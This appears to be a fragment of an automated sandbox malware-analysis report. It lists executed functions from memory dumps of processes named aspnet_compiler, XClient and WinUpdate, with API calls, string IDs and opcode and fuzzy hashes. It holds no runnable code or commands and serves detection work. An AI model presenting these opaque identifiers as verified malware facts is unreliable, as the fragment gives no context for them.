                                                                                                                                                                                                                  • Opcode ID: 9dfb985b1cf0a3b1f9e50f0e091a64642015006bf78f54b7aa51a457d50973b8
                                                                                                                                                                                                                  • Instruction ID: c2fc1d97aeb1421cdd87b6152a475317e0ef099f94b63fcf9883992045440ef5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dfb985b1cf0a3b1f9e50f0e091a64642015006bf78f54b7aa51a457d50973b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A214AB6901259CFCB14CFAAD885BEEBBF4EF49310F14805AE455A3281D738AA44DF71
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 05C81B44 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05C831BA), ref: 05C832A7
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3690575991.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5c80000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                                                                                                  • Opcode ID: 2f6d8e20f67ebba3da64fe05aa5eb0a3a4d99fa5c39d8907ccd17bd104da133d
                                                                                                                                                                                                                  • Instruction ID: 3cfb644396eeba25897e651b4c944ae071dbcf9ffd4bad3fa4d8dba6eecdbed9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f6d8e20f67ebba3da64fe05aa5eb0a3a4d99fa5c39d8907ccd17bd104da133d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A1114B1C006599BCB10DF9AC844BEEFBF4FB48724F11856AD818A7241D378A954CFE5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 05C83238 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05C831BA), ref: 05C832A7
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3690575991.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5c80000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                                                                                                  • Opcode ID: a7f8247ae008292a2ddab099ca6b49e117e516ff09f602da0486011332fa19cc
                                                                                                                                                                                                                  • Instruction ID: a355110693aa19e6bc4ce4fae5eb48e9053dd78241ddd4cc8d4c5776b3d2c445
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7f8247ae008292a2ddab099ca6b49e117e516ff09f602da0486011332fa19cc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 801103B1C006599BCB10DF9AC5457DEFBF4BB48720F15852AD818A7241D378A9448FA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0102D0EC Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3630112604.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_102d000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 18bc03c671606c051b532b243d8bcbed2ea1f81142a26caf67ad8f4fdb8227aa
                                                                                                                                                                                                                  • Instruction ID: 150b5f0cce078fa402e36ca6e923ae3ccd580040ea8b03ba0c931efa5b473522
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18bc03c671606c051b532b243d8bcbed2ea1f81142a26caf67ad8f4fdb8227aa
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A32122B1604200AFDB01DF58C8C0B26BBA5FB84314F30C9ADD88A4B786C336D846CBA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0102D0E7 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3630112604.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_102d000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                                                                  • Instruction ID: 77f97689534c8dd0a5b12a0a10039e02a9cb7f57cc2aca5f4e4df18bd362fec0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211D075544240DFDB02CF54D9C4B15BFB2FB44314F24C6AED8494B696C33AD80ACB91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 01140C20 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: tPdq
                                                                                                                                                                                                                  • API String ID: 0-2402691438
                                                                                                                                                                                                                  • Opcode ID: d10d5ace5c388ac17767db489f94ebb79b43894cb8bf6204155bf970071954f2
                                                                                                                                                                                                                  • Instruction ID: ead9d612295d5c369a0bad5a682dfb2d9cf850d7a426b83355bfb563a01719a4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d10d5ace5c388ac17767db489f94ebb79b43894cb8bf6204155bf970071954f2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B3148757006118FCB18AB39C45892D7BF2AF8A71636104B8E906CF3B5DE36DC42CB80
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 01140D5A Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 8hq
                                                                                                                                                                                                                  • API String ID: 0-4057917415
                                                                                                                                                                                                                  • Opcode ID: d61c4f870a2fec325c55c3feebf7d9bac11655f611d64759d5ba8d44d2267cef
                                                                                                                                                                                                                  • Instruction ID: fb619a8db621c93157bc0003f098fcf1562c11e11693e69298c672e5227345a7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61c4f870a2fec325c55c3feebf7d9bac11655f611d64759d5ba8d44d2267cef
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68F027742003408FC702FB79E405B697FE5BF8A708B014499F108DB3AACB209C449790
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 01140D68 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 8hq
                                                                                                                                                                                                                  • API String ID: 0-4057917415
                                                                                                                                                                                                                  • Opcode ID: 8a527d0f0af041987b625f99cd55f160c83ebc9e99ffb1db16ebc58c3ba62636
                                                                                                                                                                                                                  • Instruction ID: 358b46dc586e85507e9a8ed6862c28f3010b7edcab7a090c8994b298594a6c14
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a527d0f0af041987b625f99cd55f160c83ebc9e99ffb1db16ebc58c3ba62636
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE092742002008FC605FBADE500B69BBD9FF89609B404468E109DB3A9CB20AC459BD0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 01140848 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b3a29326638cc666f6ef05aab55c92924556b9c7ee58c50ee584833c3e987fd1
                                                                                                                                                                                                                  • Instruction ID: a772a8c609c53ad7fd5be33a3b19a89797d106684e43293b9b4ccdd0384196fe
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3a29326638cc666f6ef05aab55c92924556b9c7ee58c50ee584833c3e987fd1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C81F234A00214DFCB19EB79D8047AEB7E6FF89704F108569E509D7358EB319D46CB91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 011408A8 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: a253c744eb58544ff02e3198c4614635ab724ee9009d4ffc6080f96cb866b1f4
                                                                                                                                                                                                                  • Instruction ID: 2f967975343911006464a8206a212642f2d4048997f72bed5025fa586086ce88
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a253c744eb58544ff02e3198c4614635ab724ee9009d4ffc6080f96cb866b1f4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3241DE30E002059FDB18EBB9C5082AEB7E6FFC8B04F108569E905D73A4EF319C468791
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0114092D Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 586e870651cc6392f43fcd58a12b7fca1282fde2f6e3e69e2949779451d3ef82
                                                                                                                                                                                                                  • Instruction ID: fc9c9f55bff85220c83c9bdc4a5ee32a4e1417b82e3b5f1c63ce190685c38831
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 586e870651cc6392f43fcd58a12b7fca1282fde2f6e3e69e2949779451d3ef82
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E219D34B002158FDB18ABB9C50C3ADB7E6FF88B19F104468E909D73A8DF359C468B91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 01140E18 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 7484c7f30fd28cae7eca55b297493ad4b66566630bb9a05fcea24f57a120a15c
                                                                                                                                                                                                                  • Instruction ID: 529ac4820e5e0d7f076e8bc6357594e4a4fcc0f0a99a9169ddfacd57fe7e8f4f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7484c7f30fd28cae7eca55b297493ad4b66566630bb9a05fcea24f57a120a15c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCF06D782002009FCB05AB68E448AA93FB4FF4EA29B2041A5FA08D732AC731DC45AB40
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 01140D22 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118664504.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1140000_XClient.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: e6150d12d6383a13dae26eef101e259c2cc648183dc8a749bc4a01dcd8d18eda
                                                                                                                                                                                                                  • Instruction ID: 61b4845405f2650a205a93eef86ce0d55d108873d1e481a369536f69087c71da
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6150d12d6383a13dae26eef101e259c2cc648183dc8a749bc4a01dcd8d18eda
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE0EC79544380DFCB169F74E4599653F70FF5A25831500DADC49CB36AD321DC469B11
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 031971C0 Relevance: 16.1, Strings: 12, Instructions: 1108COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ,hq$4$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-55242283
                                                                                                                                                                                                                  • Opcode ID: 4516b1b6c64020c2f2f92b81abff632e92435467f4a3ee229cd213709ab101d8
                                                                                                                                                                                                                  • Instruction ID: 3e7988285cc96519167cad96209ec0538b932c276acb2cfcd914ff97c78d35f7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4516b1b6c64020c2f2f92b81abff632e92435467f4a3ee229cd213709ab101d8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64B21934A10218DFEB14DFA4C994BADB7B6FF48700F19819AE505AB3A5CB71AD81CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 031974F7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ,hq$4$$dq$$dq$$dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-967947350
                                                                                                                                                                                                                  • Opcode ID: 339b0c9d835e582f477035336506fa96d2acf28bfe3e529c759de870cf8fe5ce
                                                                                                                                                                                                                  • Instruction ID: 64872b68d4398081d163d5986da652673bcce0735d5fed1345941ff85b029132
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 339b0c9d835e582f477035336506fa96d2acf28bfe3e529c759de870cf8fe5ce
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C220834A10219CFEF24DFA4C994BA9B7B6FF48300F1981AAD509AB395DB719D81CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0319D138 Relevance: 4.2, Strings: 3, Instructions: 482COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Hhq$Hhq$Hhq
                                                                                                                                                                                                                  • API String ID: 0-327223379
                                                                                                                                                                                                                  • Opcode ID: 7b1a0d8951411bac9fa60b8901a7799f68c571893c24b913cec55f360273771b
                                                                                                                                                                                                                  • Instruction ID: 19f807a37a838dec436effe1dd185de6d26504a4846ebad62cb797e15284ea3b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b1a0d8951411bac9fa60b8901a7799f68c571893c24b913cec55f360273771b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18125D35A002048FDB24EFA9D594AAEBBF2FF88301F14856DD50A9B395DB35EC46CB50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 03191BE0 Relevance: 4.0, Strings: 3, Instructions: 208COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: d%jq$d%jq$$dq
                                                                                                                                                                                                                  • API String ID: 0-3225424129
                                                                                                                                                                                                                  • Opcode ID: d3a44e7e43f0c35cd29df9b9a36437c897290c42f44d692a76cbd28090879bc9
                                                                                                                                                                                                                  • Instruction ID: 1a2843359b6e2c0def9ceafeb2a4c5ef991261c4aab612ce2fa9b20aac6a71b5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3a44e7e43f0c35cd29df9b9a36437c897290c42f44d692a76cbd28090879bc9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00610274B04325AFEB19EA788C1173A6AE6AF89210F1641BBD506DB3D0DF719C8183A1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0319C7E8 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$d
                                                                                                                                                                                                                  • API String ID: 0-2835645469
                                                                                                                                                                                                                  • Opcode ID: ef5e812880891cca21b3b45e1792317fe1c529f329f1599e748ad77a251fa583
                                                                                                                                                                                                                  • Instruction ID: 7d0cf0b9d51d7ee30674baea527e9ac4fe733290edc56681ff2a935c3946cd0e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef5e812880891cca21b3b45e1792317fe1c529f329f1599e748ad77a251fa583
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BD16C346006068FDB14DF29C49096ABBF6FF8D310B5989AAD49A9B355DB30FC46CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0319B4E9 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$(hq
                                                                                                                                                                                                                  • API String ID: 0-2483692461
                                                                                                                                                                                                                  • Opcode ID: ee5e8c8200e61bdb51e7a3e35d0c87c74fbb00d9ddc31102bbd5c6911a81f491
                                                                                                                                                                                                                  • Instruction ID: 71be1da3355e80f8603d239a7f5a6ba7af21ed343447d4358e888dd432a2036e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee5e8c8200e61bdb51e7a3e35d0c87c74fbb00d9ddc31102bbd5c6911a81f491
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D61C0353042158FDF15DF28E890AAE7BA2EF89301F18856AE905CF395CB34DD46CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 03199070 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$Hhq
                                                                                                                                                                                                                  • API String ID: 0-2633903351
                                                                                                                                                                                                                  • Opcode ID: b1c24eb7a82f2f839bf691f1f858eeb8f701feb8c6ae832974b7f818cda7c254
                                                                                                                                                                                                                  • Instruction ID: ac64932c5c2ecdb24eb266cf12b840015e05c7d0ee7ce5aa5ab608f05b723868
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1c24eb7a82f2f839bf691f1f858eeb8f701feb8c6ae832974b7f818cda7c254
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC519B397002148FDB29EF78C46456EBBA2EFC931171489ADD5069B3A4DF35EC06CB91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 03195638 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$Hhq
                                                                                                                                                                                                                  • API String ID: 0-2633903351
                                                                                                                                                                                                                  • Opcode ID: a981f9a9333e684b740425ed5d527d2e738e0a973d75f78624cc3835e57f1434
                                                                                                                                                                                                                  • Instruction ID: 2e60c75214f9d827414015c171be122eca788dffd4b25ef76124b17e40210a00
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a981f9a9333e684b740425ed5d527d2e738e0a973d75f78624cc3835e57f1434
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 594124343047508FE726DF3AD45035ABBE2EF89310F148A6ED18A8B695DB74E849CB91
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0319A4E0 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2155998242.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_3190000_WinUpdate.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (_dq
                                                                                                                                                                                                                  • API String ID: 0-95542857
                                                                                                                                                                                                                  • Opcode ID: 609448730bb4b44236466d2d303b7625e67d585f9dc48696029563bde2b2cca0
                                                                                                                                                                                                                  • Instruction ID: d573d2a188878354bf9026a067a352ad162ef9d54c84ae42cc7a9b9ab9d4be3f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 609448730bb4b44236466d2d303b7625e67d585f9dc48696029563bde2b2cca0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA227035B002049FEB18DFA9C490AADBBF6FF88310F15855AE905AB391DB71ED85CB50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 031954C3 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
